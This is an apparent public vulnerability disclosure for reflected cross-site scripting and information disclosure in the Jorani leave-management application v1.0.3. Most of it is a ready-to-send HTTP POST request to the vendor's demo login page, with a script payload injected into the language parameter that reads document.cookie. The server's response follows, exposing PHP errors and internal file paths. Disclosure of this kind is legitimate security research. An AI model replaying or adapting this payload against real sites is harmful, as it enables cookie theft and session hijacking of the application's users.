## Title: Jorani -v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure ## Author: nu11secur1ty ## Date: 08/27/2023 ## Vendor: https://jorani.org/ ## Software: https://demo.jorani.org/session/login ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Reference: https://portswigger.net/web-security/information-disclosure ## Description: The value of the `language request` parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the token session and he can discover sensitive information for the server. STATUS: HIGH-Vulnerability [+]Exploit: ```POST POST /session/login HTTP/1.1 Host: demo.jorani.org Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK Origin: http://demo.jorani.org Upgrade-Insecure-Requests: 1 Referer: http://demo.jorani.org/session/login Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 183 csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue= ``` [+]Response: ```HTTP HTTP/1.1 200 OK date: Sun, 27 Aug 2023 06:03:04 GMT content-type: text/html; charset=UTF-8 Content-Length: 681 server: Apache x-powered-by: PHP/8.2 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; SameSite=Strict set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly; SameSite=Lax last-modified: Sun, 27 Aug 2023 06:03:04 GMT vary: Accept-Encoding cache-control: private, no-cache, no-store, proxy-revalidate, no-transform, must-revalidate pragma: no-cache x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1 x-iplb-instance: 27474 connection: close

A PHP Error was encountered

Severity: 8192

Message: strlen(): Passing null to parameter #1 ($string) of type string is deprecated

Filename: controllers/Connection.php

Line Number: 126

A PHP Error was encountered

Severity: Warning

Message: Cannot modify header information - headers already sent by (output started at /home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)

Filename: helpers/url_helper.php

Line Number: 565

``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html) ## Time spend: 01:35:00